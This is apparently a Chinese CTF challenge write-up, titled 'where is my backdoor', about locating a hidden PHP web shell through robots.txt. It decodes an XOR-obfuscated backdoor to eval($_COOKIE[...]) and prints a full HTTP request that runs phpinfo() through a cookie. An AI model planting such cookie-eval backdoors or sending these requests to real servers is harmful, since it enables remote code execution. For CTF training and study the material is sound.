### 1.题目名称

where is my backdoor



### 2.题目类型

web(middle hard)



### 3.题目描述

我记得我之前拿过这个网站的shell，大伙们帮忙找找吧



### 4.考察知识点

信息收集 + http协议理解 + 混淆后门分析



### 5.解题思路

1.扫描发现robots.txt中的backdoor666666.php

2.访问后发现是一个使用异或混淆的php，手动异或可解得eval($_COOKIE['where_the_fuck_i_am'])

3.使用cookie注入响应的payload可以执行命令，示例如下：

```
GET /backdoor666666.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 FirePHP/0.7.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,pl;q=0.6
Cookie: PHPSESSID=7q899tv01jsm3kvfqc0f9ft641; where_the_fuck_i_am=phpinfo()%3b
Connection: close

```







